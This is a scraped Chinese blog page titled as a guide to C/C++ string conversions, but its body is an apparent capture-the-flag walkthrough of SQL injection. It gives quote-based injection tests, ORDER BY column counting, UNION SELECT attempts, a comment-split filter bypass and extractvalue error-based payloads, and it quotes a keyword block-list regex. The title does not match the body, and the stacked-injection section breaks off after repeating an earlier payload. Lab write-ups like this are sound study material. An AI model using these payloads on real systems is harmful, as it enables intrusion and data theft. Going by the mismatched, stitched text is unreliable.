2. 程式人生 > 其它 >C/C++ char*、string、CString各種字串之間轉換

C/C++ char*、string、CString各種字串之間轉換

阿新 發佈:2021-07-17

一 首先判斷注入點的存在以及型別。

1 正常

1' 報錯,並根據報錯資訊以及1'#回顯正常判斷出符號包裹為單引號

1' and 1=1# 返回資訊

1' and 1=2#無返回資訊 因此存在單引號注入點

輸入1' or 1=1 #可得到這個表的所有內容

二 獲取列數

1' order by 1#
1' order by 2#
1' order by 3#  報錯

列數為2

三 嘗試獲取資料庫名 表名 版本等基本資訊

-1' union select database()#

返回

return preg_match("/select|update|delete|drop|insert|where|\./i
 
",$inject);

多個關鍵詞都被過濾 /i 表示大小寫都會被匹配到。

大小寫無法繞過過濾,嘗試註釋繞過。

-1' union sele/**/ct database()#

也無法返回正常結果。

嘗試報錯注入

1' and extractvalue(1,concat(0x7e,user(),0x7e)) #

1' and extractvalue(1,concat(0x7e,database(),0x7e)) #

1' and extractvalue(1,concat(0x7e,version(),0x7e)) #

報出期望資訊,但是沒有select 無法查詢更詳細的欄位資訊。

四 堆疊注入

-1' union sele/**/ct database()#

相關推薦

C/C++ char*stringCString各種字串之間轉換

stringstring.hcstring的區別 <string.h> <string.h>是C版本的標頭檔案,包含比如strcpystrcat之類的字串處理函式。

C++中cstringstringstring.h的區別

在學習演算法題的過程中,最常見的就是字串輸入,一般都會涉及到幾個不同的標頭檔案,這裡總結一下這幾個同文件的異同之處。

C#中charstring的入門使用教程

char 字元 char代表一個Unicode字元,它是System.Char的別名 char someChar = \'a\';//定義了一個字元

QStringstringchar*的相互轉換

技術標籤:QT 一QtQString 轉為C++標準庫 stringstring str = qstr.toStdString(); 二C++標準庫 string轉為QtQString:

C++中char*與string互轉

技術標籤:C++ stringchar*的轉換,在c++中比較常見,兩者相互轉換如下: (1)char*轉string

C++ wchar_t char wstring string 轉換

1.wchart_t轉wstring 1 wchar_t tmpRuleStr[10] = {0}; 2 wstring m_tmpRuleStr = wstring(tmpRuleStr); 2.wstring轉wchar_t

3.實現一個函式clone 可以對Javascript中的五種主要資料型別(NumberstringObjectArrayBoolean)進行復制

實現一個函式CLONE 可以對JAVASCRIPT中的五種主要資料型別(NUMBERSTRINGOBJECTARRAYBOOLEAN)進行復制

StringStringBuffer 和 StringBuilder

  String、StringBuffer 和 StringBuilder 都位於 java.lang 包下,都屬於字串操作類。String 使用了final類修飾,是不可變類;StringBuffer 是執行緒安全類,StringBuilder 是非執行緒安全類,巴拉巴拉。。。僅僅

Delphi 系統[23]關鍵字和保留字 arrayfilesetstringinnil

Delphi 系統[23]關鍵字和保留字 arrayfilesetstringinnil 1定義: array :宣告一個數組。

Rust學習——常見集合(VecStringHashMap)

vector 特點:一個挨著一個地儲存一系列數量可變的值。 只能儲存相同型別的值。

C# 用什麼方法將BitConverter.ToString產生字串轉換回去

本文介紹了C# 用什麼方法將BitConverter.ToString產生字串轉換回去,分享給大家,具體如下:

【JSON】java物件JSON物件與JSON字串之間轉換

JSON:java物件--->JSON物件--->JavaScript物件 (1)簡介 型別:資料傳輸的角度:字串型別

C#中的charstring和StringBuilder的使用詳解

char 字元 char代表一個Unicode字元,它是System.Char的別名 char someChar = \'a\';//定義了一個字元

C++-stringchar *char[]的相互轉換

原文連結:https://www.cnblogs.com/Pillar/p/4206452.html C++中string、char *、char[]的轉換   頭段時間有人問過我這個問題,可是我一點頭緒都沒有,直接說不會。現在從網上找了點資料,看了看,知道點東西了。

C++ 相關的string 函式(memcpymemovestrtokstrchr)

memcpy和memove void* memove(void*destin , void* source, size_t count) { //進行這樣的判斷是為了解決拷貝重疊的情況

CStringstringchar *的比較【完整版】

>>> (一)概述 stringCString均是字串模板類,string是標準模板類(STL)定義的字串類,已經納入C++標準之中;

C#初學者教程系列4:C#資料型別示例,intdoublestring

本文是C#初學者簡單教程,這是第4篇。感謝觀看,記得關注我,後續還有更多教程文章,謝謝。

C語言實現二叉樹的各種遞迴非遞迴遍歷(前序後序中序層級遍歷)

技術標籤:演算法題 二叉樹遍歷 #include <stdio.h> #include <stdlib.h> #define NULL 0

C#面試題(類和結構體String和StringBuilderequals和==)

類和結構體 類和結構體的不同點:    1.關鍵字不同 一個是class,一個是struct

C#高階特性(二反射)

今天來講解反射的應用: 一反射是什麼? 簡訴一下,反射就是.Net Framework 的一個幫助類庫,可以獲取並使用metadata(元資料清單);說的通俗易懂點,就是不用通過引用,仍然可以使用其他層的類。